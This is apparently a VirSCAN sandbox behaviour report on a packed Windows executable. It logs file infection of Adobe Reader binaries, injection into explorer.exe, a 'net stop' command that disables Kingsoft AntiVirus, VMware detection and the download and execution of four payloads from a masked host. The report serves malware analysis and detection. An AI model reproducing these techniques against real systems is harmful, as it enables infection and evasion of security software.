1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.
| Safety rating:31 |
| Behavior list |
| Basic Information | |
|---|---|
| MD5: | 08642f705e58784564d5f8a7994f8def |
| file type: | EXE |
| Production company: | |
| version: | 1.0.0.0---1.0.0.0 |
| Shell or compiler information: | COMPILER:Upack 2.4 - 2.9 beta -> Dwing [Overlay] |
| Key behavior | |
|---|---|
| Behavior description: | 修改原系统的EXE文件 |
| details: | C:\install.exe |
| C:\222c25ed\IE8-Setup-Full\installservices.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe | |
| C:\Program Files\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-2052-7B44-A90000000001}\Setup.exe | |
| C:\Program Files\e\e.exe | |
| C:\Program Files\e\unins000.exe | |
| Behavior description: | 跨进程写入数据 |
| details: | TargetProcess = C:\WINDOWS\explorer.exe, WriteAddress = 0x03550000, Size = 0x00000014 |
| TargetProcess = C:\WINDOWS\explorer.exe, WriteAddress = 0x03540000, Size = 0x00000028 | |
| Behavior description: | 设置线程上下文 |
| details: | C:\WINDOWS\Logo1_.exe |
| Behavior description: | 杀掉进程 |
| details: | C:\WINDOWS\system32\RavMon.exe |
| Behavior description: | 获取TickCount值 |
| details: | TickCount = 487640, SleepMilliseconds = 2000. |
| TickCount = 487656, SleepMilliseconds = 2000. | |
| TickCount = 487671, SleepMilliseconds = 2000. | |
| TickCount = 487765, SleepMilliseconds = 2000. | |
| TickCount = 487859, SleepMilliseconds = 2000. | |
| TickCount = 487890, SleepMilliseconds = 2000. | |
| TickCount = 487906, SleepMilliseconds = 2000. | |
| TickCount = 487953, SleepMilliseconds = 2000. | |
| TickCount = 506296, SleepMilliseconds = 20000. | |
| TickCount = 506718, SleepMilliseconds = 20000. | |
| TickCount = 506765, SleepMilliseconds = 20000. | |
| TickCount = 507303, SleepMilliseconds = 100. | |
| Behavior description: | 查找文件方式探测虚拟机 |
| details: | FindFirstFileEx: FileName = C:\Program Files\VMware\_desktop.ini |
| FindFirstFileEx: FileName = C:\Program Files\VMware\*.exe | |
| FindFirstFileEx: FileName = C:\Program Files\VMware\*.* | |
| Process behavior | |
|---|---|
| Behavior description: | 隐藏窗口创建进程 |
| details: | ImagePath = , CmdLine = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\$$a3.bat |
| ImagePath = , CmdLine = net stop "Kingsoft AntiVirus Service" | |
| Behavior description: | 跨进程写入数据 |
| details: | TargetProcess = C:\WINDOWS\explorer.exe, WriteAddress = 0x03550000, Size = 0x00000014 |
| TargetProcess = C:\WINDOWS\explorer.exe, WriteAddress = 0x03540000, Size = 0x00000028 | |
| Behavior description: | 创建新文件进程 |
| details: | ImagePath = C:\WINDOWS\Logo1_.exe, CmdLine = C:\WINDOWS\Logo1_.exe |
| Behavior description: | 创建进程 |
| details: | ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\$$a3.bat |
| ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net stop "Kingsoft AntiVirus Service" | |
| ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 stop "Kingsoft AntiVirus Service" | |
| Behavior description: | 设置线程上下文 |
| details: | C:\WINDOWS\Logo1_.exe |
| Behavior description: | 枚举进程 |
| details: | N/A |
| Behavior description: | 杀掉进程 |
| details: | C:\WINDOWS\system32\RavMon.exe |
| Behavior description: | 创建本地线程 |
| details: | TargetProcess: Logo1_.exe, InheritedFromPID = 632, ProcessID = 1160, ThreadID = 1372, StartAddress = 0040ABE4, Parameter = 00000000 |
| TargetProcess: Logo1_.exe, InheritedFromPID = 632, ProcessID = 1160, ThreadID = 784, StartAddress = 0040AD40, Parameter = 00000000 | |
| TargetProcess: explorer.exe, InheritedFromPID = 1868, ProcessID = 1944, ThreadID = 564, StartAddress = 03564238, Parameter = 00000000 | |
| TargetProcess: explorer.exe, InheritedFromPID = 1868, ProcessID = 1944, ThreadID = 1880, StartAddress = 6302B849, Parameter = 000DE9C0 | |
| TargetProcess: explorer.exe, InheritedFromPID = 1868, ProcessID = 1944, ThreadID = 2760, StartAddress = 769AE43B, Parameter = 00100008 | |
| Behavior description: | 创建下载文件进程 |
| details: | ImagePath = C:\WINDOWS\0Sy.exe, CmdLine = C:\WINDOWS\0Sy.exe |
| ImagePath = C:\WINDOWS\1Sy.exe, CmdLine = C:\WINDOWS\1Sy.exe | |
| ImagePath = C:\WINDOWS\2Sy.exe, CmdLine = C:\WINDOWS\2Sy.exe | |
| ImagePath = C:\WINDOWS\3Sy.exe, CmdLine = C:\WINDOWS\3Sy.exe | |
| File behavior | |
|---|---|
| Behavior description: | 创建文件 |
| details: | C:\WINDOWS\rundl132.exe |
| Behavior description: | 修改原系统的EXE文件 |
| details: | C:\install.exe |
| C:\222c25ed\IE8-Setup-Full\installservices.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe | |
| C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe | |
| C:\Program Files\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-2052-7B44-A90000000001}\Setup.exe | |
| C:\Program Files\e\e.exe | |
| C:\Program Files\e\unins000.exe | |
| Behavior description: | 创建可执行文件 |
| details: | C:\WINDOWS\rundl132.exe |
| C:\WINDOWS\Logo1_.exe | |
| Behavior description: | 覆盖已有文件 |
| details: | C:\WINDOWS\rundl132.exe |
| C:\1.txt | |
| Behavior description: | 查找文件 |
| details: | FileName = C:\WINDOWS\rundl132.exe |
| Behavior description: | 删除文件 |
| details: | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\wpad[1].dat |
| C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlms[1].txt | |
| C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlms[1].exe | |
| C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlgt[1].txt | |
| C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlgt[1].exe | |
| C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlzt[1].txt | |
| C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlzt[1].exe | |
| C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlfz[1].txt | |
| C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C1OS62RY\dlfz[1].exe | |
| Behavior description: | 修改BAT脚本文件 |
| details: | C:\Documents and Settings\Administrator\Local Settings\Temp\$$a3.bat ---> Offset = 0 |
| Behavior description: | 修改文件内容 |
| details: | C:\WINDOWS\rundl132.exe ---> Offset = 0 |
| C:\WINDOWS\Logo1_.exe ---> Offset = 0 | |
| Network behavior | |
|---|---|
| Behavior description: | 联网打开网址 |
| details: | InternetOpenUrlA: http://**.133.40.**:128/wpad.dat, hInternet = 0x00cc0010, Flags = 0x00000010 |
| Behavior description: | 下载文件 |
| details: | URLDownloadToFileW: http://ww****om/sysdl/dlms.txt ---> c:\1.txt |
| C:\1.txt | |
| URLDownloadToFileW: http://ww****om/sysdl/dlms.exe ---> C:\WINDOWS\0Sy.exe | |
| C:\WINDOWS\0Sy.exe | |
| URLDownloadToFileW: http://ww****om/sysdl/dlgt.txt ---> c:\1.txt | |
| URLDownloadToFileW: http://ww****om/sysdl/dlgt.exe ---> C:\WINDOWS\1Sy.exe | |
| C:\WINDOWS\1Sy.exe | |
| URLDownloadToFileW: http://ww****om/sysdl/dlzt.txt ---> c:\1.txt | |
| URLDownloadToFileW: http://ww****om/sysdl/dlzt.exe ---> C:\WINDOWS\2Sy.exe | |
| C:\WINDOWS\2Sy.exe | |
| URLDownloadToFileW: http://ww****om/sysdl/dlfz.txt ---> c:\1.txt | |
| URLDownloadToFileW: http://ww****om/sysdl/dlfz.exe ---> C:\WINDOWS\3Sy.exe | |
| C:\WINDOWS\3Sy.exe | |
| Behavior description: | 连接指定站点 |
| details: | InternetConnectA: ServerName = ww****om, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000 |
| InternetConnectA: ServerName = **.133.40.**, PORT = 128, UserName = , Password = , hSession = 0x00cc0010, hConnect = 0x00cc0014, Flags = 0x00000010 | |
| Behavior description: | 打开HTTP连接 |
| details: | InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489), hSession = 0x00cc0004 |
| InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0), hSession = 0x00cc0010 | |
| Behavior description: | 建立到一个指定的套接字连接 |
| details: | URL: wpad, IP: **.133.40.**:128, SOCKET = 0x000007b0 |
| URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x000007b4 | |
| URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x000007c8 | |
| URL: ww****om, IP: **.133.40.**:80, SOCKET = 0x000007cc | |
| Behavior description: | 读取网络文件 |
| details: | hFile = 0x00cc0018, BytesToRead =4010, BytesRead = 4010. |
| hFile = 0x00cc000c, BytesToRead =2048, BytesRead = 2048. | |
| Behavior description: | 发送HTTP包 |
| details: | GET /wpad.dat HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0) Host: **.133.40.**:128 � |
| GET /sysdl/dlms.txt HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive � | |
| GET /sysdl/dlms.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive � | |
| GET /sysdl/dlgt.txt HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive � | |
| GET /sysdl/dlgt.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive � | |
| GET /sysdl/dlzt.txt HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive � | |
| GET /sysdl/dlzt.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive � | |
| GET /sysdl/dlfz.txt HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive � | |
| GET /sysdl/dlfz.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; KB974489) Host: ww****om Connection: Keep-Alive � | |
| Behavior description: | 打开HTTP请求 |
| details: | HttpOpenRequestA: ww****om:80/sysdl/dlms.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010 |
| HttpOpenRequestA: **.133.40.**:128/wpad.dat, hConnect = 0x00cc0014, hRequest = 0x00cc0018, Verb: GET, Referer: , Flags = 0x00000010 | |
| HttpOpenRequestA: ww****om:80/sysdl/dlms.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010 | |
| HttpOpenRequestA: ww****om:80/sysdl/dlgt.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010 | |
| HttpOpenRequestA: ww****om:80/sysdl/dlgt.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010 | |
| HttpOpenRequestA: ww****om:80/sysdl/dlzt.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010 | |
| HttpOpenRequestA: ww****om:80/sysdl/dlzt.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010 | |
| HttpOpenRequestA: ww****om:80/sysdl/dlfz.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010 | |
| HttpOpenRequestA: ww****om:80/sysdl/dlfz.exe, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x00400010 | |
| Behavior description: | 按名称获取主机地址 |
| details: | gethostbyname: computer |
| GetAddrInfoW: computer | |
| GetAddrInfoW: wpad | |
| GetAddrInfoW: ww****om | |
| Registry behavior | |
|---|---|
| Behavior description: | 修改注册表 |
| details: | \REGISTRY\USER\S-*\Software\Microsoft\Windows NT\CurrentVersion\Windows\load |
| \REGISTRY\MACHINE\SOFTWARE\Soft\DownloadWWW\auto | |
| \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings | |
| \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\ver_down0 | |
| \REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\0Sy.exe | |
| \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\ver_down1 | |
| \REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\1Sy.exe | |
| \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\ver_down2 | |
| \REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\2Sy.exe | |
| Behavior description: | 删除注册表键值 |
| details: | \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer |
| \REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL | |
| Other behavior | |
|---|---|
| Behavior description: | 创建互斥体 |
| details: | CTF.LBES.MutexDefaultS-* |
| CTF.Compart.MutexDefaultS-* | |
| CTF.Asm.MutexDefaultS-* | |
| CTF.Layouts.MutexDefaultS-* | |
| CTF.TMD.MutexDefaultS-* | |
| CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-* | |
| RasPbFile | |
| MSCTF.Shared.MUTEX.APH | |
| Local\ZonesCounterMutex | |
| Local\ZoneAttributeCacheCounterMutex | |
| Local\ZonesCacheCounterMutex | |
| Local\ZonesLockedCacheCounterMutex | |
| MSCTF.Shared.MUTEX.ELH | |
| MSCTF.Shared.MUTEX.IH | |
| MSCTF.Shared.MUTEX.EOC | |
| Behavior description: | 枚举网络共享资源 |
| details: | N/A |
| Behavior description: | 创建事件对象 |
| details: | EventName = CTF.ThreadMarshalInterfaceEvent.000007B4.00000000.00000013 |
| EventName = CTF.ThreadMIConnectionEvent.000007B4.00000000.00000013 | |
| EventName = MSCTF.SendReceive.Event.ELH.IC | |
| EventName = MSCTF.SendReceiveConection.Event.ELH.IC | |
| EventName = MSCTF.SendReceive.Event.IH.IC | |
| EventName = MSCTF.SendReceiveConection.Event.IH.IC | |
| EventName = MSCTF.SendReceive.Event.MJH.IC | |
| EventName = MSCTF.SendReceiveConection.Event.MJH.IC | |
| EventName = CTF.ThreadMarshalInterfaceEvent.000007B4.00000000.00000014 | |
| EventName = CTF.ThreadMIConnectionEvent.000007B4.00000000.00000014 | |
| Behavior description: | 查找指定窗口 |
| details: | NtUserFindWindowEx: [Class,Window] = [RavMonClass,RavMon.exe] |
| NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,] | |
| NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,] | |
| Behavior description: | 获取TickCount值 |
| details: | TickCount = 487640, SleepMilliseconds = 2000. |
| TickCount = 487656, SleepMilliseconds = 2000. | |
| TickCount = 487671, SleepMilliseconds = 2000. | |
| TickCount = 487765, SleepMilliseconds = 2000. | |
| TickCount = 487859, SleepMilliseconds = 2000. | |
| TickCount = 487890, SleepMilliseconds = 2000. | |
| TickCount = 487906, SleepMilliseconds = 2000. | |
| TickCount = 487953, SleepMilliseconds = 2000. | |
| TickCount = 506296, SleepMilliseconds = 20000. | |
| TickCount = 506718, SleepMilliseconds = 20000. | |
| TickCount = 506765, SleepMilliseconds = 20000. | |
| TickCount = 507303, SleepMilliseconds = 100. | |
| Behavior description: | 调整进程token权限 |
| details: | SE_LOAD_DRIVER_PRIVILEGE |
| Behavior description: | 枚举窗口 |
| details: | N/A |
| Behavior description: | 修改后的可执行文件签名信息 |
| details: | C:\install.exe(签名验证: 未通过) |
| C:\222c25ed\IE8-Setup-Full\installservices.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe(签名验证: 未通过) | |
| C:\Program Files\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-2052-7B44-A90000000001}\Setup.exe(签名验证: 未通过) | |
| C:\Program Files\e\e.exe(签名验证: 未通过) | |
| C:\Program Files\e\unins000.exe(签名验证: 未通过) | |
| Behavior description: | 可执行文件签名信息 |
| details: | C:\WINDOWS\rundl132.exe(签名验证: 未通过) |
| C:\WINDOWS\Logo1_.exe(签名验证: 未通过) | |
| Behavior description: | 调用Sleep函数 |
| details: | [1]: MilliSeconds = 2000. |
| [2]: MilliSeconds = 20000. | |
| [3]: MilliSeconds = 100. | |
| [4]: MilliSeconds = 100. | |
| [5]: MilliSeconds = 100. | |
| [6]: MilliSeconds = 100. | |
| [7]: MilliSeconds = 100. | |
| [8]: MilliSeconds = 100. | |
| [9]: MilliSeconds = 100. | |
| [10]: MilliSeconds = 20000. | |
| Behavior description: | 可执行文件MD5 |
| details: | C:\WINDOWS\rundl132.exe ---> f75e81aa8aa132c4a108ea88293b912c |
| C:\WINDOWS\Logo1_.exe ---> f75e81aa8aa132c4a108ea88293b912c | |
| Behavior description: | 修改后的可执行文件MD5 |
| details: | C:\install.exe ---> b2291e1127a49e78b850b17d6a443cd9 |
| C:\222c25ed\IE8-Setup-Full\installservices.exe ---> 125e121c055430d9e2d4530b7062f1db | |
| C:\Program Files\Adobe\Reader 9.0\Reader\A3DUtility.exe ---> 4dab014f966d3ca7fb02acda0d3bcce8 | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroBroker.exe ---> 4a96f3cc0b0375621fcbfdb3153ed7b1 | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe ---> 3227de1ba7167d8aef8c7ffe0d4f86d5 | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32Info.exe ---> 8f21bfc299c183e0e389808b471d24cb | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe ---> c0c6896f932ffb9bf8b6b814b0160dfb | |
| C:\Program Files\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe ---> 92b516d5cb5a00435c0f76b3fa9da7ae | |
| C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe ---> 502a7e868b7e85fe2932b7ef4bf6a236 | |
| C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> f326ae3393c560f6c6a45936aefaff67 | |
| C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe ---> 7028bf4e091a8f1ccf0e9cab6ce40384 | |
| C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe ---> f3bab6991c0a593dfdc1713ff50e3c47 | |
| C:\Program Files\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-2052-7B44-A90000000001}\Setup.exe ---> 06058a91822219aad3f2685e9e2305e5 | |
| C:\Program Files\e\e.exe ---> fb26931cfdf6a80a85280915e465f1b7 | |
| C:\Program Files\e\unins000.exe ---> 68f8fc7f96cca4c9d69aa8253f5e9c93 | |
| Behavior description: | 加载新释放的文件 |
| details: | Image: C:\WINDOWS\vDll.dll. |
| Behavior description: | 查找文件方式探测虚拟机 |
| details: | FindFirstFileEx: FileName = C:\Program Files\VMware\_desktop.ini |
| FindFirstFileEx: FileName = C:\Program Files\VMware\*.exe | |
| FindFirstFileEx: FileName = C:\Program Files\VMware\*.* | |
| Run screenshot |
|---|
 |
HOME
